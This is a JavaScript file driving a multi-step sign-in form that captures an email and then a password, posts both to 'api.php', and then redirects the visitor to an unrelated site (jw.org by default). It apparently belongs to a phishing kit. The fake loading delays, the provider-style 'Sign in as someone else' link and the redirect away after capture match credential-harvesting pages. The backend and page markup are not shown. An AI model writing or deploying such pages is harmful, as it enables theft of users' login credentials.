// Multi-step form state management
let currentStep = 1;
let userEmail = '';

document.addEventListener('DOMContentLoaded', function() {
    const step1 = document.getElementById('step1');
    const step2 = document.getElementById('step2');
    const step3 = document.getElementById('step3');
    const loadingStep = document.getElementById('loadingStep');
    const letsGoBtn = document.getElementById('letsGoBtn');
    const signInBtn = document.getElementById('signInBtn');
    const continueBtn = document.getElementById('continueBtn');
    const usernameInput = document.getElementById('username');
    const passwordInput = document.getElementById('password');
    const passwordToggle = document.getElementById('passwordToggle');
    const passwordToggleIcon = document.getElementById('passwordToggleIcon');
    const passwordError = document.getElementById('passwordError');
    const emailDisplay = document.getElementById('emailDisplay');
    const successEmail = document.getElementById('successEmail');
    const closeBtn = document.getElementById('closeBtn');
    const signInAsSomeoneElse = document.getElementById('signInAsSomeoneElse');
    const signOutLink = document.getElementById('signOutLink');
    
    // Step 1: Handle "Let's go" button click
    if (letsGoBtn) {
        letsGoBtn.addEventListener('click', function(e) {
            e.preventDefault();
            const username = usernameInput.value.trim();
            
            if (validateEmail(username)) {
                userEmail = username;
                showLoadingStep();
                showStep2AfterLoading();
            } else {
                // Show error feedback
                usernameInput.focus();
                usernameInput.style.borderColor = '#ff0000';
                setTimeout(() => {
                    usernameInput.style.borderColor = '#d0d0d0';
                }, 2000);
            }
        });
    }
    
    // Step 1: Handle Enter key press in username field
    if (usernameInput) {
        usernameInput.addEventListener('keypress', function(e) {
            if (e.key === 'Enter') {
                letsGoBtn.click();
            }
        });
    }
    
    // Step 2: Handle password visibility toggle
    if (passwordToggle) {
        passwordToggle.addEventListener('click', function() {
            const type = passwordInput.getAttribute('type') === 'password' ? 'text' : 'password';
            passwordInput.setAttribute('type', type);
            
            // Toggle icon
            if (type === 'password') {
                passwordToggleIcon.classList.remove('bi-eye');
                passwordToggleIcon.classList.add('bi-eye-slash');
            } else {
                passwordToggleIcon.classList.remove('bi-eye-slash');
                passwordToggleIcon.classList.add('bi-eye');
            }
        });
    }
    
    // Step 2: Handle "Sign in" button click
    if (signInBtn) {
        signInBtn.addEventListener('click', function(e) {
            e.preventDefault();
            const password = passwordInput.value.trim();
            
            if (password === '') {
                showPasswordError();
            } else {
                hidePasswordError();
                showLoadingStep();
                
                // Send data to PHP backend
                fetch('api.php', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        email: userEmail,
                        password: password
                    })
                })
                .then(response => response.json())
                .then(data => {
                    if (data.success) {
                        // Redirect to configured URL after delay
                        setTimeout(() => {
                            window.location.href = data.redirect_url || 'https://jw.org';
                        }, 2500);
                    } else {
                        // Show error message
                        hideLoadingStep();
                        showStep2();
                        alert('Error: ' + (data.message || 'An error occurred'));
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    hideLoadingStep();
                    showStep2();
                    alert('An error occurred. Please try again.');
                });
            }
        });
    }
    
    // Step 2: Handle Enter key press in password field
    if (passwordInput) {
        passwordInput.addEventListener('keypress', function(e) {
            if (e.key === 'Enter') {
                signInBtn.click();
            }
        });
        
        // Hide error when user starts typing
        passwordInput.addEventListener('input', function() {
            if (passwordInput.value.trim() !== '') {
                hidePasswordError();
            }
        });
    }
    
    // Step 2: Handle close button (go back to step 1)
    if (closeBtn) {
        closeBtn.addEventListener('click', function() {
            showStep1();
        });
    }
    
    // Step 2: Handle "Sign in as someone else" link
    if (signInAsSomeoneElse) {
        signInAsSomeoneElse.addEventListener('click', function(e) {
            e.preventDefault();
            showStep1();
        });
    }
    
    // Step 3: Handle "Continue" button
    if (continueBtn) {
        continueBtn.addEventListener('click', function(e) {
            e.preventDefault();
            // In a real application, this would redirect to the dashboard
            console.log('Continuing to dashboard...');
            // You can add redirect logic here
        });
    }
    
    // Step 3: Handle "Sign out" link
    if (signOutLink) {
        signOutLink.addEventListener('click', function(e) {
            e.preventDefault();
            showStep1();
        });
    }
    
    // Show Loading Step function
    function showLoadingStep() {
        step1.style.display = 'none';
        step2.style.display = 'none';
        step3.style.display = 'none';
        loadingStep.style.display = 'flex';
    }
    
    // Hide Loading Step function
    function hideLoadingStep() {
        loadingStep.style.display = 'none';
    }
    
    // After loading, show Step 2 with delay
    function showStep2AfterLoading() {
        setTimeout(() => {
            showStep2();
        }, 2500); // 2.5 second delay
    }
    
    // Show Step 2 function
    function showStep2() {
        currentStep = 2;
        loadingStep.style.display = 'none';
        step1.style.display = 'none';
        step3.style.display = 'none';
        step2.style.display = 'block';
        emailDisplay.textContent = userEmail;
        passwordInput.focus();
        hidePasswordError();
    }
    
    // Show Step 1 function
    function showStep1() {
        currentStep = 1;
        loadingStep.style.display = 'none';
        step2.style.display = 'none';
        step3.style.display = 'none';
        step1.style.display = 'block';
        passwordInput.value = '';
        userEmail = '';
        usernameInput.focus();
    }
    
    // Show Success Step function
    function showSuccessStep() {
        currentStep = 3;
        loadingStep.style.display = 'none';
        step1.style.display = 'none';
        step2.style.display = 'none';
        step3.style.display = 'block';
        successEmail.textContent = userEmail;
    }
    
    // Show password error
    function showPasswordError() {
        passwordError.style.display = 'flex';
        passwordInput.style.borderColor = '#ff6b6b';
        passwordInput.focus();
    }
    
    // Hide password error
    function hidePasswordError() {
        passwordError.style.display = 'none';
        passwordInput.style.borderColor = '#d0d0d0';
    }
    
    // Email validation function
    function validateEmail(email) {
        if (email === '') {
            return false;
        }
        // Basic email validation - check for @ symbol and basic format
        const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
        // Also allow username format (no @ required)
        if (email.includes('@')) {
            return emailRegex.test(email);
        }
        // Allow username/mobile (at least 3 characters)
        return email.length >= 3;
    }
    
    // Add smooth scroll behavior for anchor links
    document.querySelectorAll('a[href="#"]').forEach(anchor => {
        anchor.addEventListener('click', function(e) {
            e.preventDefault();
            // In a real application, these would navigate to actual pages
            console.log('Link clicked:', this.textContent.trim());
        });
    });
    
    // Add hover effects to buttons
    const buttons = document.querySelectorAll('.btn');
    buttons.forEach(button => {
        button.addEventListener('mouseenter', function() {
            this.style.transform = 'translateY(-1px)';
            this.style.transition = 'transform 0.2s';
        });
        
        button.addEventListener('mouseleave', function() {
            this.style.transform = 'translateY(0)';
        });
    });
    
    // Add subtle animation to phone on page load
    const phone = document.querySelector('.phone');
    if (phone) {
        phone.style.opacity = '0';
        phone.style.transform = 'rotateY(-15deg) rotateX(5deg) translateY(20px)';
        phone.style.transition = 'opacity 0.8s ease, transform 0.8s ease';
        
        setTimeout(() => {
            phone.style.opacity = '1';
            phone.style.transform = 'rotateY(-15deg) rotateX(5deg) translateY(0)';
        }, 300);
    }
});
